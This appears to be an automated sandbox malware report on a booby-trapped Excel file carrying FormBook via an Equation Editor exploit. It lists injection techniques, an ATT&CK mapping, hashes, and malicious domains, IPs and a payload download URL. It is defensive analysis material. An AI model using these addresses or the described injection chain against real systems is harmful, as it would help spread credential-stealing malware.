          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD mov eax, dword ptr fs:[00000030h]4_2_002F00AD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F01CB mov eax, dword ptr fs:[00000030h]4_2_002F01CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025200EA mov eax, dword ptr fs:[00000030h]6_2_025200EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02520080 mov ecx, dword ptr fs:[00000030h]6_2_02520080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025426F8 mov eax, dword ptr fs:[00000030h]6_2_025426F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C626F8 mov eax, dword ptr fs:[00000030h]11_2_00C626F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.241.137 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 180.215.92.80 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: FF0000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook (same Yara match sources as listed under Stealing of Sensitive Information)

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Disable or Modify Tools 1 | Credential API Hooking 1 | System Network Connections Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 41 | Security Account Manager | System Information Discovery 112 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 3 | NTDS | Security Software Discovery 221 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 22 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 1 | LSA Secrets | Virtualization/Sandbox Evasion 3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rootkit 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 111 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 3 | Proc Filesystem | System Network Configuration Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 612 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Behavior graph image not preserved. Behavior Graph ID: 321115; Sample: Tyre Pricelist.xlsx; Startdate: 20/11/2020; Architecture: WINDOWS; Score: 100]
          Processes: EQNEDT32.EXE and EXCEL.EXE started; EQNEDT32.EXE started vbc.exe; vbc.exe started RegAsm.exe (twice) and cmd.exe; cmd.exe started choice.exe; RegAsm.exe injected explorer.exe; explorer.exe started NETSTAT.EXE; NETSTAT.EXE started cmd.exe.
          Dropped files: EQNEDT32.EXE dropped C:\Users\user\AppData\...\svchost[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32); EXCEL.EXE dropped C:\Users\user\Desktop\~$Tyre Pricelist.xlsx (data).
          DNS/IP: EQNEDT32.EXE to workfinethdysanotherrainbowlomoyentthghf.ydns.eu 103.125.191.5, 49165, 80 (VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN, Viet Nam); explorer.exe to www.pestigenix.com 91.195.241.137, 49166, 80 (SEDO-ASDE, Germany) and www.atlanticdentallab.com 180.215.92.80, 49167, 80 (BCPL-SGBGPNETGlobalASNSG, Singapore).

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Tyre Pricelist.xlsx | 27% | Virustotal |
          Tyre Pricelist.xlsx | 21% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 100% | Avira | TR/AD.Swotter.sxyuz
          C:\Users\Public\vbc.exe | 100% | Avira | TR/AD.Swotter.sxyuz
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 100% | Joe Sandbox ML |
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 33% | ReversingLabs | Win32.Trojan.Wacatac
          C:\Users\Public\vbc.exe | 33% | ReversingLabs | Win32.Trojan.Wacatac

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.2.vbc.exe.510000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.2.RegAsm.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.atlanticdentallab.com | 0% | Virustotal |
          workfinethdysanotherrainbowlomoyentthghf.ydns.eu | 4% | Virustotal |

          URLs

          SourceDetectionScannerLabelLink

          Domains and IPs

          Contacted Domains

          Name                                              IP              Active  Malicious  Antivirus Detection  Reputation
          www.atlanticdentallab.com                         180.215.92.80   true    true                            unknown
          www.pestigenix.com                                91.195.241.137  true    true                            unknown
          workfinethdysanotherrainbowlomoyentthghf.ydns.eu  103.125.191.5   true    true                            unknown

            URLs from Memory and Binaries

            Name    Source    Malicious    Antivirus Detection    Reputation
                                                                                                                        high
                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.interpark.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://search.espn.go.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.%s.comPAvbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    low
                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.news.com.au/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.cdiscount.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.tiscali.it/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://it.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.ceneo.pl/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.servicios.clarin.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs


                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
91.195.241.137 | unknown | Germany | 47846 | SEDO-ASDE | true
103.125.191.5 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
180.215.92.80 | unknown | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true

                                                                                                                                                General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321115
Start date: 20.11.2020
Start time: 11:22:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 54s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Tyre Pricelist.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@15/3@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.3% (good quality ratio 20.1%)
• Quality average: 70.9%
• Quality standard deviation: 28.9%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 78
• Number of non-executed functions: 24
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

Time | Type | Description
11:23:16 | API Interceptor | 97x Sleep call for process: EQNEDT32.EXE modified
11:23:20 | API Interceptor | 55x Sleep call for process: vbc.exe modified
11:23:26 | API Interceptor | 32x Sleep call for process: RegAsm.exe modified
11:23:43 | API Interceptor | 230x Sleep call for process: NETSTAT.EXE modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

Match | Associated Sample Name / URL | Detection | Context
103.125.191.5 | 2eD17GZuWs.exe | malicious | 103.125.191.5/bin_xMjelaYnr43.bin
103.125.191.5 | Unique food order.xlsx | malicious | 103.125.191.5/bin_xMjelaYnr43.bin

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

Match | Associated Sample Name / URL | Detection | Context
SEDO-ASDE | new file.exe.exe | malicious | 91.195.241.136
SEDO-ASDE | Bonifico n.1101202910070714.exe | malicious | 91.195.241.136
SEDO-ASDE | hRVrTsMv25.exe | malicious | 91.195.241.136
SEDO-ASDE | v6k2UHU2xk.exe | malicious | 91.195.241.136
SEDO-ASDE | http://walmartmoneycard.xyz | malicious | 91.195.240.136
SEDO-ASDE | http://ww1.0ffice.com/ | malicious | 91.195.240.14
SEDO-ASDE | New Additional Agreement.exe | malicious | 91.195.240.94
SEDO-ASDE | UBEH7JEUC0.exe | malicious | 91.195.241.136
SEDO-ASDE | Additional Agreement 2020-KYC.exe | malicious | 91.195.240.94
SEDO-ASDE | H4A2-423-EM152-010.TIF.exe | malicious | 91.195.240.13
SEDO-ASDE | Additional Agreement 2020-KYC.exe | malicious | 91.195.240.94
SEDO-ASDE | ORDER7098EAR.exe | malicious | 91.195.241.136
SEDO-ASDE | mFNIsJZPe2.exe | malicious | 91.195.240.94
SEDO-ASDE | http://walmartmoneycard.xyz | malicious | 91.195.240.136
SEDO-ASDE | Additional Agreement 2020-KYC.exe | malicious | 91.195.240.94
SEDO-ASDE | AWB# 9284730932.exe | malicious | 91.195.240.94
SEDO-ASDE | DEWA PROJECT 12100317.exe | malicious | 91.195.240.94
SEDO-ASDE | http://tgreendot.com | malicious | 91.195.240.136
SEDO-ASDE | http://freeaccountnow.com | malicious | 91.195.240.136
SEDO-ASDE | http://krypton.rackage.co.uk | malicious | 91.195.240.87
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | 2eD17GZuWs.exe | malicious | 103.125.191.5
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Unique food order.xlsx | malicious | 103.125.191.5
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | tt payment proof.xlsx | malicious | 103.125.191.187
                                                                                                                                                TIE-3735-2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                payslip.s.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.187
                                                                                                                                                Telex-relase.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.120
                                                                                                                                                Y0L60XAhvo.rtfGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.139.45.59
                                                                                                                                                8YPssSkVtu.rtfGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.87
                                                                                                                                                PI098763556299.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                PIT12425009.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                wIeFid8p7Q.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.189.164
                                                                                                                                                Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.139.45.59
                                                                                                                                                shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.133.108.6
                                                                                                                                                shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.133.108.6
                                                                                                                                                EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.114.107.156
                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Z08LsyTAN6.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.189.164
                                                                                                                                                QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.123
                                                                                                                                                BCPL-SGBGPNETGlobalASNSGABSyodh8yx.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                tr2rgxBVl1.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                5kVcSS3v3q.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                VfXZcSLj.exeGet hashmaliciousBrowse
                                                                                                                                                • 14.128.35.30
                                                                                                                                                ORDERCONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.100.200
                                                                                                                                                Scan_PO238489923737483924.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.112.164
                                                                                                                                                Remittance Scan DOC-2029293#PI207-048.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.95.222
                                                                                                                                                PO8479349743085.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                PO#47974GH397.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                Maersk Kleven V949E.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                YDrnUOyMmD.exeGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                https://thehighestleveloftheworld.top/f862d13454fd267baa5fedfffb200567/signin.php?country=ZA-South%20Africa&lang=enGet hashmaliciousBrowse
                                                                                                                                                • 118.107.14.220
                                                                                                                                                https://www.amazon.co.jp.d13f0fed4d24d232f3c591.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.158
                                                                                                                                                https://amazon.account-update.amazon.co.jp.s8u913f0fed42f3c6a45b3.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.139
                                                                                                                                                http://down.idc3389.top/downloader.exeGet hashmaliciousBrowse
                                                                                                                                                • 116.193.154.122

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):599552
                                                                                                                                                Entropy (8bit):7.855744157979213
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
                                                                                                                                                MD5:429BBA6DBE159C300679509BE3085665
                                                                                                                                                SHA1:F79F58BC3142B59D0D8669595A01770BDF5486FF
                                                                                                                                                SHA-256:04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
                                                                                                                                                SHA-512:450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                Reputation:low
                                                                                                                                                IE Cache URL:http://workfinethdysanotherrainbowlomoyentthghf.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                C:\Users\user\Desktop\~$Tyre Pricelist.xlsx
                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                C:\Users\Public\vbc.exe
                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):599552
                                                                                                                                                Entropy (8bit):7.855744157979213
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
                                                                                                                                                MD5:429BBA6DBE159C300679509BE3085665
                                                                                                                                                SHA1:F79F58BC3142B59D0D8669595A01770BDF5486FF
                                                                                                                                                SHA-256:04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
                                                                                                                                                SHA-512:450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                Reputation:low

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:CDFV2 Encrypted
                                                                                                                                                Entropy (8bit):7.996727168383382
                                                                                                                                                TrID:
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                File name:Tyre Pricelist.xlsx
                                                                                                                                                File size:2481664
                                                                                                                                                MD5:3b5f7a2a0429e796040aa5bc3763a8fe
                                                                                                                                                SHA1:c049ac5a44d034995a55bd5f49aece9631c69c1f
                                                                                                                                                SHA256:9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
                                                                                                                                                SHA512:a345f1248ca41d2b88e05417c404ff3e57de909921b06a2543a79ef30ae62c1cfb5af2b5ba9ae13e2e500bb290951d3c356fe1b97990e32721b5093d6ea73766
                                                                                                                                                SSDEEP:49152:PYwpjAWZWQz/mAevYUEcg1udmyMc8gsD7iHqUg0hc:AwpsmswoVd3MCsD7iKAc

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "Tyre Pricelist.xlsx"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:True
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:False

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:64
                                                                                                                                                Entropy:2.73637206947
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
